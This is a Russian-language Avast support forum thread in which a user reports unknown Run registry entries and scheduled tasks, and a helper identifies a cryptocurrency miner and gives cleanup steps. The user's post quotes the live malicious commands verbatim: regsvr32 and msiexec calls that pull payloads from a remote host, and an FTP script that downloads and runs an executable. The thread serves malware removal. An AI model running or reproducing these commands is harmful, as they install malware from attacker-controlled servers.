Avast WEBforum
Non-English Zone => Русский => Topic started by: REDACTED on August 11, 2017, 01:00:10 AM
-
Здравствуйте, у меня такая проблема: обнаружил в реестре в разделе Run две, отсутствующие до этого записи -
Имя - Start. Тип - REG_SZ. Значение - regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll.
Имя - Start1. Тип - REG_SZ. Значение - msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q.
Кроме того в планировщике заданий появились несколько записей -
Mysa. Действие - Запуск программы. Подробности - /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe.
Mysa1
Mysa2
Mysa3
с перепугу удалил их, а потом у Вас на форуме нашел похожий случай.
Подскажите, пожалуйста, это всё или нужны еще какие-то действия ?
Прикрепил логи, собранные по инструкции.
-
alndr, здравствуйте и добро пожаловать на форум!
У вас был биткойн-майнер, который использовал вычислительные мощности ПК для добычи криптовалюты. MBAM удалил его.
1. Через Установку и удаление программ в Панели управления удалите программу WindowsMangerProtect.
2. - Сохраните прикрепленный файл fixlist.txt в папку, откуда был запущен FRST (E:\Документы\Резерв\Programs\Antivirus)
- Теперь, пожалуйста, запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
- Обратите внимание, что компьютер будет перезагружен.
ВНИМАНИЕ! Данный скрипт написан только для этого пользователя, использование его на другом компьютере может привести к неработоспособности ОС!
3. Скачайте, пожалуйста, WMI Explorer 2.0 по ссылке https://www.bleepingcomputer.com/download/wmi-explorer/
В нем, в ROOT\subscription найдите класс ActiveScriptEventConsumer, далее скопируйте скрипт, сохраните в блокноте и прикрепите в следующем сообщении. После этого данный класс можно удалить.
-
сделал по шагам, результат
прикрепил во вложении
узел root\subscription не конечный элемент дерева - это нормально ?
в нем вот такие элементы
ROOT\subscription\ms_409
ROOT\subscription\ms_419
я скопировал скрипт именно с корневого элемента.
-
alndr, проблема по-прежнему наблюдается?